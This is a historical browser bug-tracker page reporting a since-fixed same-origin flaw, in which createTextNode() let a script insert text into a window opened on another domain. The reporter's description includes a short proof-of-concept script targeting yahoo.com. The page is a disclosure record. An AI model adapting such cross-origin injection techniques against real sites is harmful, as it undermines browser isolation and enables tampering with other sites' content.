Closed Bug 15550 Opened 25 years ago Closed 25 years ago

Injecting text in documents from any domain using createTextNode()

Tracking

()

Status:

VERIFIED FIXED

Milestone:

M12

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

joro

Reporter

Description

•

25 years ago

It is possible to inject text in documents from any domain using createTextNode. The code is: <SCRIPT> a=window.open("http://www.yahoo.com"); setTimeout("f()",10000); function f() { r=a.document.createTextNode("This text injected by Georgi"); a.document.documentElement.appendChild(r); } </SCRIPT>

Norris Boyd

Assignee

Updated

•

25 years ago

Status: NEW → ASSIGNED

Jim Roskind

Updated

•

25 years ago

Blocks: 16654

Jim Roskind

Updated

•

25 years ago

No longer blocks: 16654

Norris Boyd

Assignee

Updated

•

25 years ago

Target Milestone: M12

Norris Boyd

Assignee

Updated

•

25 years ago

Status: ASSIGNED → RESOLVED

Closed: 25 years ago

Resolution: --- → FIXED

John Unruh

Comment 1

•

25 years ago

Verified fixed.

Status: RESOLVED → VERIFIED

leger

Comment 2

•

25 years ago

Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.

Component: Security → Security: General

You need to log in before you can comment on or make changes to this bug.

Bugzilla

Injecting text in documents from any domain using createTextNode()

Categories

(Core :: Security, defect, P3)

Tracking

()

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

Crash Data

Security

(public)

User Story

Description

Updated

Updated

Updated

Updated

Updated

Comment 1

Comment 2